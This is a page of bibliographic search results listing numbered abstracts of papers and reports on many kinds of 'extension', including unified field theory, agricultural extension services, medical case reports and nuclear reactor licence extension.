It is unusual for a system to successfully meet such a wide range of requirements, but in this case the ability to scope the requirements in a single objective and the flexibility inherent in the wide design space created by the many options have made it possible. 15. Energy Extension Service Program planning manual Energy Technology Data Exchange (ETDEWEB) Liersch, Judith M. 1979-06-01 The manual is the first revision of the EES Program Planning Manual. At the states' request, there have been a number of changes to the state EES contacts list, and an updated list is included in this package as the revised Appendix D. Part I, Introduction, presents: How to Use the State Program Planning Manual and The Energy Extension Service Program. Part II, Applying for an EES Grant, presents: The Annual State Application for Financial Assistance; State Financial Assistance and Associated Requirements; Preparing the State Plan. Part III, Operating a State EES, presents: Start-Up Considerations; State Program Reporting; Recordkeeping and Financial Management. Part IV, DOE's Role, presents DOE Functions and Responsibilities and Special Cases: Development and Implementation of a State Plan by the EES Director and Administrative Review. 16. Covariant extensions and the nonsymmetric unified field International Nuclear Information System (INIS) Borchsenius, K. 1976-01-01 The problem of generally covariant extension of Lorentz invariant field equations, by means of covariant derivatives extracted from the nonsymmetric unified field, is considered. It is shown that the contracted curvature tensor can be expressed in terms of a covariant gauge derivative which contains the gauge derivative corresponding to minimal coupling, if the universal constant p, characterizing the nonsymmetric theory, is fixed in terms of Planck's constant and the elementary quantum of charge. By this choice the spinor representation of the linear connection becomes closely related to the spinor affinity used by Infeld and Van Der Waerden (Sitzungsber. Preuss. Akad. Wiss. Phys. Math. Kl.; 9:380 (1933)) in their generally covariant formulation of Dirac's equation. (author) 17. Complex singlet extension of the standard model International Nuclear Information System (INIS) Barger, V.; Langacker, P.; McCaskey, M.; Ramsey-Musolf, M.; Shaughnessy, G. 2009-01-01 We analyze a simple extension of the standard model (SM) obtained by adding a complex singlet to the scalar sector (cxSM). We show that the cxSM can contain one or two viable cold dark matter candidates and analyze the conditions on the parameters of the scalar potential that yield the observed relic density. When the cxSM potential contains a global U(1) symmetry that is both softly and spontaneously broken, it contains both a viable dark matter candidate and the ingredients necessary for a strong first order electroweak phase transition as needed for electroweak baryogenesis. We also study the implications of the model for discovery of a Higgs boson at the Large Hadron Collider 18. Analytical extension of curved shock theory Science.gov (United States) Emanuel, G. 2018-03-01 Curved shock theory (CST) is limited to shock waves in a steady, two-dimensional or axisymmetric (2-Ax) flow of a perfect gas. A unique feature of CST is its use of intrinsic coordinates that result in an elegant and useful formulation for flow properties just downstream of a shock. For instance, the downstream effect of upstream vorticity, shock wave curvature, and the upstream pressure gradient along a streamline is established. There have been several attempts to extend CST, as mentioned in the text. Removal of the steady, 2-Ax, and perfect gas limitations, singly or in combination, requires an appropriate formulation of the shock wave's jump relations and the intrinsic coordinate Euler equations. Issues discussed include flow plane versus osculating plane, unsteady flow, vorticity, an imperfect gas, etc. The extension of CST utilizes concepts from differential geometry, such as the osculating plane, streamline torsion, and the Serret-Frenet equations. 19. Extensive hypertrophic lupus erythematosus: Atypical presentation Directory of Open Access Journals (Sweden) Tarun Narang 2012-01-01 Full Text Available Lupus erythematosus (LE is a disease with a wide spectrum of cutaneous and systemic manifestations. Clinical features of patients with LE show a great variation, and for this reason it is difficult to develop a unifying concept of this disease. Our objective is to present a case of hypertrophic LE with atypical morphology and extensive involvement, who responded favorably to isotretinoin. Diagnosis of hypertrophic lupus erythematosus (HLE was confirmed by characteristic histopathological findings. Combination therapy with isotretinoin and hydroxychloroquine resulted in flattening and repression of previously refractory skin lesions. Sometimes, HLE lesions may present a diagnostic and therapeutic dilemma. In long standing lesions, squamous cell carcinoma may arise. Therefore, HLE requires adequate therapy with clinical and histopathological follow up. 20. Holomorphic extension of generalizations of Hp functions Directory of Open Access Journals (Sweden) Richard D. Carmichael 1985-01-01 Full Text Available In recent analysis we have defined and studied holomorphic functions in tubes in ℂn which generalize the Hardy Hp functions in tubes. In this paper we consider functions f(z, z=x+iy, which are holomorphic in the tube TC=ℝn+iC, where C is the finite union of open convex cones Cj, j=1,…,m, and which satisfy the norm growth of our new functions. We prove a holomorphic extension theorem in which f(z, z ϵ TC, is shown to be extendable to a function which is holomorphic in T0(C=ℝn+i0(C, where 0(C is the convex hull of C, if the distributional boundary values in 𝒮′ of f(z from each connected component TCj of TC are equal. 1. Learning investment indicators through data extension Science.gov (United States) Dvořák, Marek 2017-07-01 Stock prices in the form of time series were analysed using single and multivariate statistical methods. After simple data preprocessing in the form of logarithmic differences, we augmented this single variate time series to a multivariate representation. This method makes use of sliding windows to calculate several dozen of new variables using simple statistic tools like first and second moments as well as more complicated statistic, like auto-regression coefficients and residual analysis, followed by an optional quadratic transformation that was further used for data extension. These were used as a explanatory variables in a regularized logistic LASSO regression which tried to estimate Buy-Sell Index (BSI) from real stock market data. 2. Radiology and Enterprise Medical Imaging Extensions (REMIX). Science.gov (United States) Erdal, Barbaros S; Prevedello, Luciano M; Qian, Songyue; Demirer, Mutlu; Little, Kevin; Ryu, John; O'Donnell, Thomas; White, Richard D 2018-02-01 Radiology and Enterprise Medical Imaging Extensions (REMIX) is a platform originally designed to both support the medical imaging-driven clinical and clinical research operational needs of Department of Radiology of The Ohio State University Wexner Medical Center. REMIX accommodates the storage and handling of "big imaging data," as needed for large multi-disciplinary cancer-focused programs. The evolving REMIX platform contains an array of integrated tools/software packages for the following: (1) server and storage management; (2) image reconstruction; (3) digital pathology; (4) de-identification; (5) business intelligence; (6) texture analysis; and (7) artificial intelligence. These capabilities, along with documentation and guidance, explaining how to interact with a commercial system (e.g., PACS, EHR, commercial database) that currently exists in clinical environments, are to be made freely available. 3. Production Flexibility in Extensive Beef Farming Systems Directory of Open Access Journals (Sweden) Laura Astigarraga 2011-03-01 Full Text Available The aim of this work is to assess the flexibility of production allowed by extensive production conditions faced with variations in the environment, i.e., market variations and climatic fluctuations, of Limousin beef systems. The study used a case-based methodology in which seven beef farms with less than 1 LU/ha were chosen. Data collection was based on three interviews using a semistructured questionnaire and on the analysis of productive and economic results over a 15-year period (1991-2005. The main evolution of these farms is related to a rise in work productivity associated with an increase in herd size. Herd increase was made possible by enlarging the area, the margin of intensification being limited in these regions. To take advantage of the enlarged land area, females were reared for fattening or for reproduction instead of selling them at weaning. The Limousin female provides a wide product mix because of its plasticity, as has been studied by several researchers. This mix flexibility is achieved by delaying product differentiation, a form of production flexibility that can reduce the risk of under-producing or over-producing varied product configurations. On the other hand, calves sold to the Italian market after weaning are generic products, associated with a flexible production process to overcome fluctuations in forage availability due to climatic variations. The introduction of maize silage for feeding acts as an alternative route, actual and potential, through the system to overcome unexpected forage shortage from natural grasslands as a result of droughts. The study shows that extensive farming systems have developed types of flexibility to match different factors of uncertainty from the environment. Finally, the issue of farm system performance is thus not so much a question of whether a farm is fit at a specific moment in time, but whether it transforms into a less or more sustainable orientation. 4. Electron beam radiotherapy for the management of recurrent extensive ocular surface squamous neoplasia with orbital extension Directory of Open Access Journals (Sweden) Ramesh Murthy 2015-01-01 Full Text Available Recurrent extensive ocular surface squamous neoplasia (OSSN with orbital invasion can be successfully managed with external radiotherapy using electrons resulting in eye and vision salvage. We report a case of right eye recurrent OSSN in an immunocompetent adult Indian male, with extensive orbital involvement. The patient had two previous surgical excisions with recurrent disease. At this stage, conventionally exenteration is considered the treatment modality. However, he was treated with 5040 cGy radiotherapy (15eV electrons resulting in complete disease regression. At the end of 3 years follow-up, the patient was disease free, maintained a vision of 20/25, with mild dry eye, well-managed with topical lubricants. Extensive OSSN with orbital invasion does not always need exenteration. External beam electron radiotherapy provides a noninvasive cure with organ and vision salvage and should be considered in extensive OSSN not amenable to simple excision biopsies. Long-term studies to evaluate the effect of radiation on such eyes are suggested. 5. Electron beam radiotherapy for the management of recurrent extensive ocular surface squamous neoplasia with orbital extension. Science.gov (United States) Murthy, Ramesh; Gupta, Himika; Krishnatry, Rahul; Laskar, Siddhartha 2015-08-01 Recurrent extensive ocular surface squamous neoplasia (OSSN) with orbital invasion can be successfully managed with external radiotherapy using electrons resulting in eye and vision salvage. We report a case of right eye recurrent OSSN in an immunocompetent adult Indian male, with extensive orbital involvement. The patient had two previous surgical excisions with recurrent disease. At this stage, conventionally exenteration is considered the treatment modality. However, he was treated with 5040 cGy radiotherapy (15eV electrons) resulting in complete disease regression. At the end of 3 years follow-up, the patient was disease free, maintained a vision of 20/25, with mild dry eye, well-managed with topical lubricants. Extensive OSSN with orbital invasion does not always need exenteration. External beam electron radiotherapy provides a noninvasive cure with organ and vision salvage and should be considered in extensive OSSN not amenable to simple excision biopsies. Long-term studies to evaluate the effect of radiation on such eyes are suggested. 6. A Needs Assessment of Aquaculture Extension Agents, Specialists, and Program Administrators in Extension Programming Science.gov (United States) Schwarz, Michael H.; Gibson, Jerry 2010-01-01 The study reported here identified continuing education and training needs of aquaculture Extension agents, specialists, and program administrators in 10 competency areas relating to the need for continuing education or training. Fourteen resources on the AquaNIC Web site were also evaluated, as was the efficacy of the AQUA-EXT listserv. Data were… 7. Using Non-Extension Volunteering as an Experiential Learning Activity for Extension Professionals Science.gov (United States) Andrews, Kevin B.; Lockett, Landry L. 2013-01-01 Extension professionals can gain much-needed competencies in volunteer administration through experiential learning by participating in volunteer activities. Experiential learning is a means of behavior change that allows the individual learner to reflect on, abstract, and apply their experiences to new situations. This article expands on… 8. Lightweight Nozzle Extension for Liquid Rocket Engines Project Data.gov (United States) National Aeronautics and Space Administration — The ARES J-2X requires a large nozzle extension. Currently, a metallic nozzle extension is being considered with carbon-carbon composite as a backup. In Phase 1,... 9. The XML approach to implementing space link extension service management Science.gov (United States) Tai, W.; Welz, G. A.; Theis, G.; Yamada, T. 2001-01-01 A feasibility study has been conducted at JPL, ESOC, and ISAS to assess the possible applications of the eXtensible Mark-up Language (XML) capabilities to the implementation of the CCSDS Space Link Extension (SLE) Service Management function. 10. Hunger in Virginia : Extension's response ability : a resource guide OpenAIRE Taper, L. Janette 1987-01-01 Provides information to educate Extension professionals on the issue of hunger and malnutrition in Virginia. This guide will allow Extension professionals to conduct nutrition education programs in low income communities to help them improve their diets. 11. On non-extensive nature of thermal conductivity Abstract. In this paper we study non-extensive nature of thermal conductivity. It is observed that there is similarity between non-extensive entropic index and fractal dimension obtained for the silica aerogel thermal conductivity data at low temperature. 12. 76 FR 4350 - Health Information Technology Extension Program Science.gov (United States) 2011-01-25 ... DEPARTMENT OF HEALTH AND HUMAN SERVICES Health Information Technology Extension Program ACTION: Public Notice. SUMMARY: This notice announces changes to the Health Information Technology Extension... of the National Coordinator for Health Information Technology, 200 Independence Ave, SW., Suite 729D... 13. Extensible automated dispersive liquid–liquid microextraction Energy Technology Data Exchange (ETDEWEB) Li, Songqing; Hu, Lu; Chen, Ketao; Gao, Haixiang, E-mail: [email protected] 2015-05-04 Highlights: • An extensible automated dispersive liquid–liquid microextraction was developed. • A fully automatic SPE workstation with a modified operation program was used. • Ionic liquid-based in situ DLLME was used as model method. • SPE columns packed with nonwoven polypropylene fiber was used for phase separation. • The approach was applied to the determination of benzoylurea insecticides in water. - Abstract: In this study, a convenient and extensible automated ionic liquid-based in situ dispersive liquid–liquid microextraction (automated IL-based in situ DLLME) was developed. 1-Octyl-3-methylimidazolium bis[(trifluoromethane)sulfonyl]imide ([C{sub 8}MIM]NTf{sub 2}) is formed through the reaction between [C{sub 8}MIM]Cl and lithium bis[(trifluoromethane)sulfonyl]imide (LiNTf{sub 2}) to extract the analytes. Using a fully automatic SPE workstation, special SPE columns packed with nonwoven polypropylene (NWPP) fiber, and a modified operation program, the procedures of the IL-based in situ DLLME, including the collection of a water sample, injection of an ion exchange solvent, phase separation of the emulsified solution, elution of the retained extraction phase, and collection of the eluent into vials, can be performed automatically. The developed approach, coupled with high-performance liquid chromatography–diode array detection (HPLC–DAD), was successfully applied to the detection and concentration determination of benzoylurea (BU) insecticides in water samples. Parameters affecting the extraction performance were investigated and optimized. Under the optimized conditions, the proposed method achieved extraction recoveries of 80% to 89% for water samples. The limits of detection (LODs) of the method were in the range of 0.16–0.45 ng mL{sup −1}. The intra-column and inter-column relative standard deviations (RSDs) were <8.6%. Good linearity (r > 0.9986) was obtained over the calibration range from 2 to 500 ng mL{sup −1}. The proposed 14. Cauchy-Kovalevskaya extension theorem in fractional Clifford analysis OpenAIRE Vieira, Nelson 2015-01-01 In this paper, we establish the fractional Cauchy-Kovalevskaya extension (FCK-extension) theorem for fractional monogenic functions defined on R^d. Based on this extension principle, fractional Fueter polynomials, forming a basis of the space of fractional spherical monogenics, i.e. fractional homogeneous polynomials, are introduced. We studied the connection between the FCK-extension of functions of the form x^\\alpha P_l and the classical Gegenbauer polynomials. Finally we present two examp... 15. Lateral Distribution Functions of Extensive Air Showers Science.gov (United States) Geranios, A.; Fokitis, E.; Maltezos, S.; Koutsokosta, D.; Antoniadou, I.; Malandraki, O.; Mastichiadis, A.; Antonopoulou, E.; Gika, V.; Dimitrakoudis, S. The energy is among the characteristics of Ultra High Energy Cosmic Rays (E>5 x 1019 eV) which could be estimated experimentally. The following paper attempts to estimate the energy of an UHECR proton by applying a Monte Carlo simulation code. A number of extensive air showers, vertical and inclined, is simulated to derive the Lateral Distribution Functions of the shower muons. The scenario of simulations is adopted to the Cerenkov surface detector of the P. AUGER Observatory. Due to the fact that the Lateral Distribution Functions show minimal fluctuations of the muon density at a distance larger than 800 m from the core of the showers, and due to the fact that at a distance of 900 m the distribution functions for inclined showers coincide (which means that it does not change with the zenith angle of the showers), we select the muon density at 900 m to derive the energy of the primary protons. (The project is co-funded by the European Social Fund and National Resources (EPEAEK II) PYTHAGORAS II.) 16. Latest results of the Tunka Radio Extension Directory of Open Access Journals (Sweden) Kostunin D. 2017-01-01 Full Text Available The Tunka Radio Extension (Tunka-Rex is an antenna array consisting of 63 antennas at the location of the TAIGA facility (Tunka Advanced Instrument for cosmic ray physics and Gamma Astronomy in Eastern Siberia, nearby Lake Baikal. Tunka-Rex is triggered by the air-Cherenkov array Tunka-133 during clear and moonless winter nights and by the scintillator array Tunka-Grande during the remaining time. Tunka-Rex measures the radio emission from the same air-showers as Tunka-133 and Tunka-Grande, but with a higher threshold of about 100 PeV. During the first stages of its operation, Tunka-Rex has proven, that sparse radio arrays can measure air-showers with an energy resolution of better than 15% and the depth of the shower maximum with a resolution of better than 40 g/cm2. To improve and interpret our measurements as well as to study systematic uncertainties due to interaction models, we perform radio simulations with CORSIKA and CoREAS. In this overview we present the setup of Tunka-Rex, discuss the achieved results and the prospects of mass-composition studies with radio arrays. 17. Extensive Mandibular Ameloblastic Fibro-Odontoma. Science.gov (United States) Ribeiro, Cínthia Magalhães; Santos, Tatiana Tavares Marcelino Dos; de Castro, Sérgio Roberto; de Carli, Marina Lara; Sperandio, Felipe Fornias; Hanemann, João Adolfo Costa; Pereira, Alessandro Antônio Costa 2016-09-01 Ameloblastic fibro-odontoma (AFO) is a mixed odontogenic tumor that presents epithelial and mesenchymal components. Ameloblastic fibro-odontoma is generally diagnosed between the first and second decades of life and normally shows a slow clinical growth in the posterior portion of the maxilla or mandible, being mostly associated with 1 or more impacted teeth. Radiographic features of AFO show a radiolucent well-defined, uni, or multilocular defect due to containing variable amounts of calcified material. The enucleation of the tumor is the usual conduct and should be followed up for a long period of time. Here, the authors report the case of 17-year-old male patient who presented an extensive AFO on the right posterior side of the mandible. The panoramic radiograph and the tomographic examination revealed a multilocular radiolucent lesion with impacted teeth. Histological examination revealed connective tissue resembling the dental papilla along with epithelial strands or islands, as well as dental hard tissue such enamel and dentin. Enucleation and curettage was performed and led to good outcome. There was no recurrence after an 8-year follow-up, and oral rehabilitation was performed with dental implants. 18. Molecular regulation of plant cell wall extensibility Science.gov (United States) Cosgrove, D. J. 1998-01-01 Gravity responses in plants often involve spatial and temporal changes in cell growth, which is regulated primarily by controlling the ability of the cell wall to extend. The wall is thought to be a cellulose-hemicellulose network embedded in a hydrated matrix of complex polysaccharides and a small amount of structural protein. The wall extends by a form of polymer creep, which is mediated by expansins, a novel group of wall-loosening proteins. Expansins were discovered during a molecular dissection of the "acid growth" behavior of cell walls. Expansin alters the rheology of plant walls in profound ways, yet its molecular mechanism of action is still uncertain. It lacks detectable hydrolytic activity against the major components of the wall, but it is able to disrupt noncovalent adhesion between wall polysaccharides. The discovery of a second family of expansins (beta-expansins) sheds light on the biological role of a major group of pollen allergens and implies that expansins have evolved for diverse developmental functions. Finally, the contribution of other processes to wall extensibility is briefly summarized. 19. Greater trochanteric fracture with occult intertrochanteric extension. Science.gov (United States) Reiter, Michael; O'Brien, Seth D; Bui-Mansfield, Liem T; Alderete, Joseph 2013-10-01 Proximal femoral fractures are frequently encountered in the emergency department (ED). Prompt diagnosis is paramount as delay will exacerbate the already poor outcomes associated with these injuries. In cases where radiography is negative but clinical suspicion remains high, magnetic resonance imaging (MRI) is the study of choice as it has the capability to depict fractures which are occult on other imaging modalities. Awareness of a particular subset of proximal femoral fractures, namely greater trochanteric fractures, is vital for both radiologists and clinicians since it has been well documented that they invariably have an intertrochanteric component which may require surgical management. The detection of intertrochanteric or cervical extension of greater trochanteric fractures has been described utilizing MRI but is underestimated with both computed tomography (CT) and bone scan. Therefore, if MRI is unavailable or contraindicated, the diagnosis of an isolated greater trochanteric fracture should be met with caution. The importance of avoiding this potential pitfall is demonstrated in the following case of an elderly woman with hip pain and CT demonstrating an isolated greater trochanteric fracture who subsequently returned to the ED with a displaced intertrochanteric fracture. 20. Supersymmetric extensions of Schrodinger-invariance International Nuclear Information System (INIS) Henkel, Malte; Unterberger, Jeremie 2006-01-01 The set of dynamic symmetries of the scalar free Schrodinger equation in d space dimensions gives a realization of the Schrodinger algebra that may be extended into a representation of the conformal algebra in d+2 dimensions, which yields the set of dynamic symmetries of the same equation where the mass is not viewed as a constant, but as an additional coordinate. An analogous construction also holds for the spin-12 Levy-Leblond equation. An N=2 supersymmetric extension of these equations leads, respectively, to a 'super-Schrodinger' model and to the (3 vertical bar 2)-supersymmetric model. Their dynamic supersymmetries form the Lie superalgebras osp(2 vertical bar 2)-bar sh(2 vertical bar 2) and osp(2 vertical bar 4), respectively. The Schrodinger algebra and its supersymmetric counterparts are found to be the largest finite-dimensional Lie subalgebras of a family of infinite-dimensional Lie superalgebras that are systematically constructed in a Poisson algebra setting, including the Schrodinger-Neveu-Schwarz algebra sns (N) with N supercharges. Covariant two-point functions of quasiprimary superfields are calculated for several subalgebras of osp(2 vertical bar 4). If one includes both N=2 supercharges and time-inversions, then the sum of the scaling dimensions is restricted to a finite set of possible values 1. No imagination effect on boundary extension. Science.gov (United States) Munger, Margaret P; Multhaup, Kristi S 2016-01-01 Boundary extension (BE) occurs when people falsely remember perceiving beyond the edges of a presented scene. Theorists argue that BE occurs because people mistakenly attribute information they have generated to the study stimulus-that is, they make a source memory error. Inspired by this idea, in six experiments we tested whether scene details resulting from explicit imagination would be misremembered as actual visual perceptions, resulting in increased BE as compared with standard instructions. In four experiments, undergraduates completed a BE task with separate study and test blocks; in two further experiments, undergraduates completed a trial-by-trial BE task (N = 290). Half of the participants elaborated on the study pictures (imagined smells and sounds, or what was to the left and right of the scene, or what a photographer would see by zooming in or out). Robust BE was found in all experiments, but none of the elaborations modified the size of BE; therefore, BE is not to be affected by explicit elaboration and may be related to spatial rather than visual imagery ability. 2. Computers make rig life extension an option Energy Technology Data Exchange (ETDEWEB) NONE 1996-10-01 The worldwide semisubmersible drilling rig fleet is approaching retirement. But replacement is not an attractive option even though dayrates are reaching record highs. In 1991, Schlumberger Sedco Forex managers decided that an alternative might exist if regulators and insurers could be convinced to extend rig life expectancy through restoration. Sedco Forex chose their No. 704 semisubmersible, an 18-year North Sea veteran, to test their process. The first step was to determine what required restoration, meaning fatigue life analysis of each weld on the huge vessel. If inspected, the task would be unacceptably time-consuming and of questionable accuracy. Instead a suite of computer programs modeled the stress seen by each weld, statistically estimated the sea states seen by the rig throughout its North Sea service and calibrated a beam-element model on which to run their computer simulations. The elastic stiffness of the structure and detailed stress analysis of each weld was performed with ANSYS, a commercially available finite-element analysis program. The use of computer codes to evaluate service life extension is described. 3. Legislated Policy as the Basis for Effective Extension Delivery ... African Journals Online (AJOL) The paper compares the extension policies and programmes of Britain and Nigeria. Extension policy in Nigeria is characterized as stemming from ad hoc arrangements which are compounded by political instability and external locus of control. The United Kingdom in contrast has had focused extension policies supported ... 4. Strategic Directions for Extension Health and Wellness Programs Science.gov (United States) Rodgers, Michelle; Braun, Bonnie 2015-01-01 The new Cooperative Extension National Framework for Health and Wellness is a tool to help Extension systematically address the programmatic area of health and wellness at the individual, community, environmental, and policy levels. Key strategies of the framework tool are provided and suggestions for ways that Extension can use this framework… 5. Evaluation of performance of extension workers in Lesotho | Mokone ... African Journals Online (AJOL) The extension service in Lesotho and other developing countries have been criticized for not being able to bring the necessary change in the farming populace, especially the rural and resource poor. Extension workers are faced with problems that need to be dealt with in order for them and extension as a whole to be ... 6. Evaluating retail format extensions : The role of shopping goals NARCIS (Netherlands) Haans, A.J. 2011-01-01 Although retail extensions have become a common growth strategy, more than 50% fail to survive. The question what drives extension success, therefore remains a key issue. This research tests the hypothesis that expectations about the attributes of extensions, and as a result of their evaluations, 7. Agriflection: A Learning Model for Agricultural Extension in South Africa Science.gov (United States) Worth, S. H. 2006-01-01 Prosperity--continuous and sustainable wealth creation--is an elusive goal in South African smallholder agriculture. This paper suggests that agricultural extension can facilitate realising this objective if an appropriate approach to extension can be developed. To develop such an approach requires that the definition of extension and the… 8. Prospectus for a Cooperative Extension System in Education. Science.gov (United States) Rogers, Everett M. 1992-01-01 This article reviews lessons learned from the agricultural extension model that may apply to the proposed cooperative extension service in education. The agricultural extension model is a user-oriented system linking knowledge producers with other knowledge users. In education, the adopters of innovations may be organizations as well as… 9. Evaluation of Effects of Maize Extension Package on Farmers ... African Journals Online (AJOL) The study examined the effects of maize extension package on farmers indigenous practices in Nwangele Local Government Area (LGA) of Imo State, Nigeria. Both farmers and extension agents were the target audience. Fifty (50) farmers and two (2) extension agents were purposively sampled from the selected ... 10. Exploring Extension Involvement in Farm to School Program Activities Science.gov (United States) Benson, Matthew C. 2014-01-01 The study reported here examined Extension professionals' involvement in farm-to-school program activities. Results of an online survey distributed to eight state Extension systems indicate that on average, Extension professionals are involved with one farm to school program activity, with most supporting school or community garden programs.… 11. Constraints to agricultural extension work in Ethiopia: the insiders ... African Journals Online (AJOL) This paper examines principal obstacles to agricultural extension work in Ethiopia. The historical review reveals that extension programs and policies have been formulated without due consideration to the farmers' opinion, the various extension approaches have been biased against the livestock sub-sector, and research ... 12. Public extension agents' need for new competencies: evidence from ... African Journals Online (AJOL) Small yield differences between Extension service-recipients and non-recipients indicate that Extension support has minimal effect on farmers' production. Agents need new competencies regarding correct application conservation agriculture. The study recommends the involvement of extension agents, scientists and ... 13. sources and use of extension information among maize farmers African Journals Online (AJOL) Sources of extension information available to farmers are diverse and numerous. Generally, extension information is sourced through extension worker, the mass media (i.e. radio and television in particular), printed publications (e.g. newspapers, magazines, bulletins, newsletters, fliers, journals, handbills) and other human ... 14. Journal of Agricultural Extension Vol.17 (2) December, 2013 ISSN ... African Journals Online (AJOL) ONIKOYI http://dx.doi.org/10.4314/jae.v17i2.14. Local Government Funding of Extension Services in Anambra ... all the local government staff of the. Agriculture and Veterinary Department in the 21 LGAs of Anambra State. ... extension, animal health, extension services and veterinary clinics; (iii) control and acquisition of land (mainly ... 15. Expanding the Reach of Extension through Social Media Science.gov (United States) Gharis, Lauri W.; Bardon, Robert E.; Evans, Jennifer L.; Hubbard, William G.; Taylor, Eric 2014-01-01 With increasing numbers of the public using social media applications, Extension professionals have the ability to apply these same tools to connect with their clients. This article demonstrates how a social media toolset can be employed by Extension professionals by identifying how Extension professionals are currently using social media,… 16. Hybrid Teaching in Extension: Learning at the Crossroads Science.gov (United States) Hino, Jeff; Kahn, Cub 2016-01-01 Extension clients' learning preferences are changing, with many increasingly going online for educational content. In response, Oregon State University Extension pilot tested a training program for Extension educators to explore hybrid teaching--a methodology that could provide more flexible access to a wider audience. Hybrid teaching offers a… 17. Using Authentic Materials for Extensive Reading to Promote English Proficiency Science.gov (United States) Guo, Siao-cing 2012-01-01 Current literature points to the importance and benefits of extensive reading. Extensive reading provides contextualized clues for better reading comprehension (Krashen, 1982), and substantial linguistic input (Bell, 1998) needed for language development. Several studies have found a correlation between extensive reading and specific linguistic… 18. Perspective of agricultural extension in livestock production in ... African Journals Online (AJOL) The extension communication methods used were visits, demonstration, workshop, training and excursion. The benefits of extension services were introduction of livestock species, marketing information, feed and feed ingredient supply, disease and pest control, and liaison services. Constraints to the use of extension ... 19. The Nature of Organizational Learning in a State Extension Organization Science.gov (United States) Leuci, Mary Simon 2012-01-01 Our complex and rapidly changing world demands a more nimble, responsive, and flexible Extension organization. The findings from a study involving interviews across a state Cooperative Extension Service paint a picture of organizational learning in Extension. Four key dimensions of learning surfaced. Of particular importance are the application of… 20. Facilitating protein solubility by use of peptide extensions Science.gov (United States) Freimuth, Paul I; Zhang, Yian-Biao; Howitt, Jason 2013-09-17 Expression vectors for expression of a protein or polypeptide of interest as a fusion product composed of the protein or polypeptide of interest fused at one terminus to a solubility enhancing peptide extension are provided. Sequences encoding the peptide extensions are provided. The invention further comprises antibodies which bind specifically to one or more of the solubility enhancing peptide extensions. 1. Division File of Extension Research Materials; Additions During 1968. Science.gov (United States) Byrn, Darcie, Comp. In this annotated bibliography of acquisitions during 1968 appear 265 Extension studies on administrative organization and management; training and staff development; mobilizing participation in Extension work; local leadership; program content and planning procedures; general effectiveness and progress in Extension; teaching methods, techniques,… 2. 1964 Statistics on Activities of Cooperative Extension Service. Science.gov (United States) Department of Agriculture, Washington, DC. The educational activities of approximately 11,000 county and 3,100 state cooperative extension staff members are presented in this statistical report for 1964. Included are data on the number of extension agents employed; extension methods (individual personal contact, news stories, radio and television broadcasts, publications, circular letters,… 3. Farmers and Extension Personnel View of Constraints to Effective ... African Journals Online (AJOL) About 54% of farmers perceived that extension service is ineffective while about 46% of extension personnel perceived it to be effective. Results show a weak correlation between personal characteristics of farmers and their perception towards the effectiveness of agricultural extension services (r = 0.081, p< 0.05). 4. Job burnout and coping strategies among extension agents in south ... African Journals Online (AJOL) The need to maintain a non-mineral dependent economy and daunting food import bills have been the drive for the provision of extension services, which is dependent on motivated extension work force.. Extension personnel will not stay motivated under circumstances where the risk of job burnout is high. A simple random ... 5. Determinants of training needs of extension personnel of agricultural ... African Journals Online (AJOL) The dynamics experienced in agricultural practice has put extension service delivery on a new platform that requires regular updating of the extension staff knowledge for new competences, to meet the changing needs of the clientele they serve. This study therefore sought to determine the training needs of extension ... 6. Stress coping strategies among agricultural extension agents in Oyo ... African Journals Online (AJOL) The study examined the coping strategies used by extension agents A total of seventy 72agricultural extension agents were randomly sampled out of 288 agricultural extension agents from the four zones (Saki, Oyo, Ogbomosho, and Ibadan) in the Oyo State Agricultural Development Programme (OYSADEP). 7. Gender Differences In Agriculture Extension Services And Training ... African Journals Online (AJOL) Findings show that despite the women\\'s important role in agricultural production, disparities exist in the delivery of extension services and training programmes in the province. The need to train, deploy and target women and men in extension services is emphasized. Keywords: gender differences, agricultural extension ... 8. The human resource conditions of lifetime extension International Nuclear Information System (INIS) Aszodi, A. 2002-01-01 Full text: According to our present knowledge, the lifetime extension of the Hungarian NPP units will be feasible, in both the technological and economic aspects. It is far more difficult, however, to answer the question whether the human resources conditions of the further application of nuclear energetics in Hungary can be satisfied. Many urgent tasks will have to be solved regarding the informing of the public and the nuclear engineering education. The training of nuclear experts is in crisis in many developed industrial countries. The university departments work with a staff mainly consisting of old and quite often near-retirement trainers and the young generation is practically missing. A particularly grave problem is (see Germany) that in a number of countries hardly any student chooses nuclear technology/engineering. Moreover, several nuclear training and research facilities have been shut down. Although the situation in Hungary is not so critical at present, the rising of the new generation of professionals may easily get into a crisis without immediate intervention. The training reactor of BUTE celebrated its 30th anniversary in 2001 and the technical conditions allow some further 20 or 25 years of operation. On the other hand, however, the age distribution of the operating staff can not be sustained even on a few-year term: the average age is 55 years, while 44% of them are retired! Although, due to financing difficulties the rejuvenation of the operating personnel has not been possible for years, it is definitely vital to maintain and develop the reactor and the ongoing educational work. By analysing the age distribution of the workers of the Hungarian energetics one can conclude: 350 to 400 young engineers will have to start work up till 2020 (i.e. 15 to 20 per year), while only 2 to 8 students graduate from the Hungarian universities who acquire some level of nuclear knowledge during their studies. In a co-operation between BUTE and the Paks NPP we are 9. NRU licence extension via integrated safety review Energy Technology Data Exchange (ETDEWEB) 2014-07-01 The National Research Reactor, NRU at AECL Chalk River Laboratories achieved first criticality in November 1957. The completion of an Integrated Safety Review (ISR) in 2011, and subsequent Global Assessment Report (GAR), and Integrated Implementation Plan (IIP) has given confidence in the safe and reliable operation of NRU, therefore extending the licensing case to safely and reliably operate NRU until 2021 and beyond (64+ years of operation). The key vehicle to achieve this confidence is the IIP, that resulted from the ISR. NRU's IIP is a 10 year plan that addresses the gaps identified in the ISR between modern codes and standards in a prioritized approach. AECL is currently in year 3 of the IIP execution, is on or ahead of schedule to complete the identified improvements. The IIP in conjunction with a License Condition Handbook has replaced the licensing protocol with the Canadian Nuclear Safety Commission, (CNSC). Execution of the IIP to plan supports the continued safe operation of NRU. The ISR was carried out with the recognition that the NRU reactor is a research and isotope producing reactor approaching license renewal and not a power reactor undergoing refurbishment and life extension. Therefore, the IIP is being executed while NRU continues to deliver on its three missions: production of medical isotopes, support for fuels and materials research, and serving as a high flux neutron source in support of research relying on neutron scattering. The IIP is grouped into 5 Global Issue Groups, (GIGs) to support focused execution. The activities and tasks within the five GIGs are being executed via a matrix organization through the use of the Chalk River Laboratories Corrective Action Program to ensure the assignment of actions, completion and evidence to support closure is documented and retained. This paper discusses the approach taken by AECL to license and ensure safe, reliable operation of NRU until 2021 and beyond. (author) 10. 75 FR 80425 - Satellite Television Extension and Localism Act of 2010 and Satellite Home Viewer Extension and... Science.gov (United States) 2010-12-22 ... FEDERAL COMMUNICATIONS COMMISSION 47 CFR 